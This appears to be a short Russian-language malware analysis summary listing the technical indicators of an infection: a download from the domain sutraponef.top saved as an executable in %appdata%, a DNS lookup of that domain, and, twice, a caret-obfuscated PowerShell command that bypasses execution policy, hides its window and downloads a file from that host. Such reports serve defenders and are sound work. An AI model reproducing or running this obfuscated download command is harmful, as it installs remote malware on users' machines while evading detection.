Техническая информация
- http://sutraponef.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^OW^Er^sHE^Ll.eX^e ^-^e^X^Ecu^tiONP^ol^IC^Y Byp^AS^s -NoProfile -WiNdoWs^TY^l^e hiDDEN (ne^W-oBjEcT ^s^y^steM^.^n^e^t^.^We^BcLIenT^).^D^O^W^NloA^dfilE(^'http://sutrapone...
- DNS ASK su###ponef.top
- '<SYSTEM32>\cmd.exe' /C "p^OW^Er^sHE^Ll.eX^e ^-^e^X^Ecu^tiONP^ol^IC^Y Byp^AS^s -NoProfile -WiNdoWs^TY^l^e hiDDEN (ne^W-oBjEcT ^s^y^steM^.^n^e^t^.^We^BcLIenT^).^D^O^W^NloA^dfilE(^'http://sutrapone...' (со скрытым окном)